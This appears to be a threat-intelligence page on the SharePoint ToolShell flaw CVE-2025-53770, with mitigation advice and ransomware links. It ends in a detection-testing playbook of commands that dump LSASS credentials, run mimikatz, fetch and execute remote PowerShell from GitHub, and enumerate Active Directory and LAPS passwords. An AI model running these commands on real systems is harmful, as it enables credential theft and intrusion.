CVE-2025-53770
Overview
This vulnerability is an unsafe deserialization flaw occurring in the on-premises Microsoft SharePoint Server web application component. The root cause lies in the improper handling of untrusted serialized data submitted to specific server endpoints, allowing manipulation of object state during deserialization. The affected feature involves the ToolPane.aspx endpoint used for SharePoint page editing, which processes serialized input without adequate validation or integrity checks.
Vulnerability Description
Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network. Microsoft is aware that an exploit for CVE-2025-53770 exists in the wild. Microsoft is preparing and fully testing a comprehensive update to address this vulnerability. In the meantime, please make sure that the mitigation provided in this CVE documentation is in place so that you are protected from exploitation.
Impact
An attacker requires no authentication or user interaction to exploit this vulnerability remotely over the network. Successful exploitation allows execution of arbitrary code with system-level privileges on the SharePoint server, resulting in full system compromise. This enables attackers to access sensitive data, deploy malware, pivot within the network, or disrupt services hosted on the affected server infrastructure.
Solution
Microsoft is preparing a comprehensive security update for SharePoint Server 2016 Enterprise, 2019, and Subscription editions to address this vulnerability. Until the patch is released, administrators should implement the mitigation steps detailed in the Microsoft Security Response Center advisory available at https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53770. This advisory provides specific guidance on configuration changes and temporary workarounds to reduce exposure.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
akira
|
LOW | 1529 | Chain Inference |
|
ransomhub
|
LOW | 842 | Chain Inference |
|
sinobi
|
LOW | 274 | Chain Inference |
|
frag
|
LOW | 30 | Chain Inference |
|
0apt
|
LOW | — | Chain Inference |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability identified in on-premises Microsoft SharePoint Server is a critical issue stemming from the deserialization of untrusted data. This flaw allows an attacker to manipulate serialized objects, potentially leading to arbitrary code execution within the context of the SharePoint application. Deserialization vulnerabilities occur when an application accepts serialized data from an untrusted source and deserializes it without proper validation. In this case, the lack of stringent checks on input data can enable an attacker to craft malicious payloads that, when processed by the server, execute unauthorized commands. The high severity of this vulnerability is underscored by its CVSS score of 9.8, indicating a significant risk to affected systems.
Attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit it. An unauthorized individual could leverage network access to send crafted requests to the SharePoint server, triggering the deserialization process. This could occur through various means, such as exploiting web application interfaces or APIs that handle serialized data. Once the malicious payload is deserialized, the attacker could gain control over the server, execute arbitrary code, and potentially escalate privileges. The existence of an exploit in the wild further amplifies the urgency for organizations to address this vulnerability, as it indicates that threat actors are actively seeking to exploit it.
The real-world impact of this vulnerability can be profound, particularly for organizations that rely heavily on SharePoint for collaboration, document management, and data storage. Successful exploitation could lead to unauthorized access to sensitive information, data breaches, and the disruption of business operations. The potential for data exfiltration or the deployment of ransomware could result in significant financial losses, reputational damage, and regulatory penalties. Furthermore, the interconnected nature of modern IT environments means that a breach in one system could have cascading effects across an organization’s entire network, increasing the overall business risk.
To mitigate the risks associated with this vulnerability, organizations should implement several detection and prevention strategies. Immediate steps include applying any available patches or updates provided by Microsoft, which are currently being tested and prepared for release. In the interim, organizations should ensure that existing mitigation measures, such as input validation and sanitization, are in place to filter out potentially harmful data. Network segmentation can also help limit the exposure of SharePoint servers to untrusted networks, reducing the attack surface. Additionally, organizations should employ intrusion detection systems (IDS) to monitor for unusual activity that may indicate exploitation attempts and conduct regular security assessments to identify and remediate vulnerabilities in their systems.
In conclusion, the deserialization vulnerability in Microsoft SharePoint Server presents a significant threat to organizations that utilize this platform. The potential for arbitrary code execution, combined with the existence of active exploits, necessitates immediate action from affected organizations. By understanding the technical details of the vulnerability, recognizing the attack vectors, assessing the real-world impact, and implementing robust detection and mitigation strategies, organizations can better protect themselves against this critical threat. The proactive management of vulnerabilities is essential in maintaining the integrity and security of enterprise environments in an increasingly complex threat landscape.
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2025-53770, reflecting a modest uptick in adversary activity despite a marginal decline in the EPSS score. This subtle rise in detection aligns with the continued availability and refinement of multiple proof-of-concept exploit tools circulating publicly, which lowers the barrier for threat actors to weaponize this vulnerability. The presence of ransomware groups such as Akira and Ransomhub linked to campaigns exploiting this flaw underscores the ongoing risk of ransomware deployment leveraging this vector. Although the overall exploit momentum has not accelerated dramatically, the persistence and diversification of attack methods maintain this vulnerability at a critical threat level. Defenders should remain vigilant as the exploitation landscape evolves, with active adversaries continuing to probe and exploit on-premises SharePoint environments. The current environment signals sustained, targeted exploitation efforts rather than a rapid escalation, reinforcing the need for continuous monitoring and adaptive defensive postures.
Update 2 — July 05, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2025-53770, reflecting a modest uptick in adversary activity against on-premises Microsoft SharePoint Server environments. This subtle rise in detections corresponds with the continued availability and refinement of multiple proof-of-concept exploits circulating publicly, which lower the barrier for threat actors to leverage this critical deserialization vulnerability. Notably, ransomware groups linked to this vector remain active, sustaining pressure on vulnerable organizations despite no marked acceleration in overall exploit momentum. While the exploitation trend remains stable without rapid escalation, the persistence of targeted attacks and the evolving exploit toolkit underscore the ongoing risk of unauthorized remote code execution and subsequent ransomware deployment. Consequently, the threat level for CVE-2025-53770 remains critical, necessitating sustained vigilance and adaptive monitoring to counter the sustained, albeit incremental, adversarial activity observed in our telemetry.
Affected Products (3)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Microsoft | Sharepoint Server | All |
cpe:2.3:a:microsoft:sharepoint_server:*:*:*:*:subscription:*:*:*
|
|
|
Microsoft | Sharepoint Server | 2016 |
cpe:2.3:a:microsoft:sharepoint_server:2016:*:*:*:enterprise:*:*:*
|
|
|
Microsoft | Sharepoint Server | 2019 |
cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Microsoft SharePoint Server ToolPane Unauthenticated Remote Code Execution (aka ToolShell)
exploits/windows/http/sharepoint_toolpane_rce
|
Viettel Cyber Security, sfewer-r7 | Unknown | win | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Microsoft SharePoint Server 2019 (16.0.10383.20020) - Remote Code Execution (RCE) | Agampreet Singh | remote | windows | - | View |
GitHub PoCs (46)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
soltanali0/CVE-2025-53770-Exploit
SharePoint WebPart Injection Exploit Tool
|
soltanali0 | 310 | 79 | 2025-07-21 | View |
|
kaizensecurity/CVE-2025-53770
POC
|
kaizensecurity | 43 | 21 | 2025-07-21 | View |
|
MuhammadWaseem29/CVE-2025-53770
Unauthenticated Remote Code Execution via unsafe deserialization in Microsoft SharePoint Server (CVE-2025-53770)
|
MuhammadWaseem29 | 58 | 4 | 2025-07-22 | View |
|
hazcod/CVE-2025-53770
Scanner for the SharePoint CVE-2025-53770 RCE zero day vulnerability.
|
hazcod | 44 | 12 | 2025-07-21 | View |
|
ZephrFish/CVE-2025-53770-Scanner
ToolShell scanner - CVE-2025-53770 and detection information
|
ZephrFish | 17 | 5 | 2025-07-21 | View |
|
3a7/CVE-2025-53770
CVE-2025-53770 Mass Scanner
|
3a7 | 15 | 1 | 2025-07-27 | View |
|
AdityaBhatt3010/CVE-2025-53770-SharePoint-Zero-Day-Variant-Exploited-for-Full-RCE
A critical zero-auth RCE vulnerability in SharePoint (CVE-2025-53770), now exploited in the wild, building directly on t...
|
AdityaBhatt3010 | 11 | 0 | 2025-07-22 | View |
|
exfil0/CVE-2025-53770
A sophisticated, wizard-driven Python exploit tool targeting CVE-2025-53770, a critical (CVSS 9.8) unauthenticated remot...
|
exfil0 | 5 | 1 | 2025-07-23 | View |
|
yosasasutsut/Blackash-CVE-2025-53770
CVE-2025-53770
|
yosasasutsut | 0 | 6 | 2025-07-21 | View |
|
Immersive-Labs-Sec/SharePoint-CVE-2025-53770-POC
|
Immersive-Labs-Sec | 4 | 0 | 2025-07-29 | View |
|
saladin0x1/CVE-2025-53770
|
saladin0x1 | 4 | 0 | 2025-09-04 | View |
|
Sec-Dan/CVE-2025-53770-Scanner
A Python-based reconnaissance scanner for safely identifying potential exposure to SharePoint vulnerability CVE-2025-537...
|
Sec-Dan | 3 | 1 | 2025-07-22 | View |
|
0xray5c68616e37/cve-2025-53770
Unauthenticated Remote Code Execution via unsafe deserialization in Microsoft SharePoint Server (CVE-2025-53770)
|
0xray5c68616e37 | 0 | 3 | 2025-07-22 | View |
|
Rabbitbong/OurSharePoint-CVE-2025-53770
Do you really think SharePoint is safe?
|
Rabbitbong | 2 | 1 | 2025-07-24 | View |
|
Bluefire-Redteam-Cybersecurity/bluefire-sharepoint-cve-2025-53770
|
Bluefire-Redteam-Cybersecurity | 3 | 0 | 2025-07-21 | View |
|
paolokappa/SharePointSecurityMonitor
A comprehensive PowerShell-based SharePoint security monitoring solution with CVE-2025-53770 protection, advanced DLL an...
|
paolokappa | 1 | 1 | 2025-07-21 | View |
|
Cameloo1/sharepoint-toolshell-micro-postmortem
Reproducible incident micro-postmortem for on-prem Microsoft SharePoint “ToolShell” (CVE-2025-53770): ATT&CK snapshot, “...
|
Cameloo1 | 1 | 1 | 2025-11-21 | View |
|
RukshanaAlikhan/CVE-2025-53770
A critical zero-day vulnerability CVE‑2025‑53770 has been actively exploited in the wild against on-premises Microsoft ...
|
RukshanaAlikhan | 0 | 2 | 2025-07-21 | View |
|
anwakub/CVE-2025-53770
|
anwakub | 1 | 0 | 2026-01-16 | View |
|
grupooruss/CVE-2025-53770-Checker
Comprueba si un servidor SharePoint on-premises es vulnerable a CVE-2025-53770
|
grupooruss | 1 | 0 | 2025-07-21 | View |
|
tripoloski1337/CVE-2025-53770-scanner
|
tripoloski1337 | 1 | 0 | 2025-07-22 | View |
|
imbas007/CVE-2025-53770-Vulnerable-Scanner
|
imbas007 | 1 | 0 | 2025-07-22 | View |
|
Udyz/CVE-2025-53770-Exploit
|
Udyz | 1 | 0 | 2025-07-25 | View |
|
harryhaxor/CVE-2025-53770-SharePoint-Deserialization-RCE-PoC
A critical vulnerability in Microsoft SharePoint Server allows unauthenticated remote code execution via deserialization...
|
harryhaxor | 1 | 0 | 2025-08-02 | View |
|
Zedocun/SharePoint-ToolShell-CVE-2025-53770-Incident-Analysis
Technical analysis of a SharePoint ToolShell (CVE-2025-53770) exploitation attempt involving RCE, webshell deployment, a...
|
Zedocun | 1 | 0 | 2026-04-01 | View |
|
zach115th/ToolShellFinder
Scans Windows IIS logs for signs of CVE-2025-53770 & CVE-2025-53771
|
zach115th | 0 | 1 | 2025-07-23 | View |
|
doerrdan/it-sec-toolshell
A Marp slide deck about CVE-2025-53770
|
doerrdan | 0 | 0 | 2026-05-28 | View |
|
0xisfet/CVE-2025-53770-Scanner
🎯 Vulnerability scanner for SharePoint servers affected by CVE-2025-53770. Detects unsafe deserialization using ToolPane...
|
0xisfet | 0 | 0 | 2025-07-28 | View |
|
gmh5225/ZeroPoint
This PowerShell script detects indicators of compromise for CVE-2025-53770 — a critical RCE vulnerability in Microsoft S...
|
gmh5225 | 0 | 0 | 2025-07-21 | View |
|
siag-itsec/CVE-2025-53770-Hunting
Hunting for Critical SharePoint Vulnerability CVE-2025-53770
|
siag-itsec | 0 | 0 | 2025-07-21 | View |
|
GreenForceNetworks/Toolshell_CVE-2025-53770
|
GreenForceNetworks | 0 | 0 | 2025-07-22 | View |
|
nisargsuthar/suricata-rule-CVE-2025-53770
Detection rules for CVE-2025-53770
|
nisargsuthar | 0 | 0 | 2025-07-24 | View |
|
bharath-cyber-root/sharepoint-toolshell-cve-2025-53770
|
bharath-cyber-root | 0 | 0 | 2025-07-24 | View |
|
bitsalv/ToolShell-Honeypot
Honeypot for CVE-2025-53770 aka ToolShell
|
bitsalv | 0 | 0 | 2025-07-25 | View |
|
BirdsAreFlyingCameras/CVE-2025-53770_Raw-HTTP-Request-Generator
Just a quick script I cooked up to exploit CVE-2025-53770
|
BirdsAreFlyingCameras | 0 | 0 | 2025-07-25 | View |
|
bossnick98/-SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE
An activity to train analysis skills and reporting
|
bossnick98 | 0 | 0 | 2025-07-27 | View |
|
daryllundy/CVE-2025-53770
Tools for detecting and assessing systems vulnerable to CVE-2025-53770 (CWE-502: Deserialization of Untrusted Data).
|
daryllundy | 0 | 0 | 2025-07-28 | View |
|
CyprianAtsyor/ToolShell-CVE-2025-53770-SharePoint-Exploit-Lab-LetsDefend
|
CyprianAtsyor | 0 | 0 | 2025-08-13 | View |
|
Michaael01/LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell
|
Michaael01 | 0 | 0 | 2025-09-23 | View |
|
victormbogu1/LetsDefend-SOC342-CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-andRCE-EventID-320
|
victormbogu1 | 0 | 0 | 2025-09-29 | View |
|
r3xbugbounty/CVE-2025-53770
|
r3xbugbounty | 0 | 0 | 2025-07-28 | View |
|
ghostn4444/CVE-2025-53770
CVE-2025-53770 - SharePoint
|
ghostn4444 | 0 | 0 | 2025-08-14 | View |
|
Agampreet-Singh/CVE-2025-53770
|
Agampreet-Singh | 0 | 0 | 2025-08-07 | View |
|
rbctee/CVE-2025-53770
Scanner for the SharePoint CVE-2025-53770 RCE zero day vulnerability (fork from hazcod/CVE-2025-53770)
|
rbctee | 0 | 0 | 2026-02-11 | View |
|
J4ck3LSyN-Gen2/CVE-2025-53770
Lab & PoC
|
J4ck3LSyN-Gen2 | 0 | 0 | 2026-03-21 | View |
|
0x-crypt/CVE-2025-53770-Scanner
🎯 Vulnerability scanner for SharePoint servers affected by CVE-2025-53770. Detects unsafe deserialization using ToolPane...
|
0x-crypt | 0 | 0 | 2025-07-28 | View |
Ransomware Groups 5
Threat Feed
55 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (30 known victims)
Ransomware group known to exploit this vulnerability (30 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability (274 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AmmyyAdmin, AnyDesk, Atera (552 known victims)
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AmmyyAdmin, AnyDesk, Atera (552 known victims)
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Backstab (Process Explorer driver) (523 known victims)
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Backstab (Process Explorer driver) (523 known victims)
Ransomware group known to exploit this vulnerability (274 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
63%
|
Medium | High |
Red Team Playbook
65 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
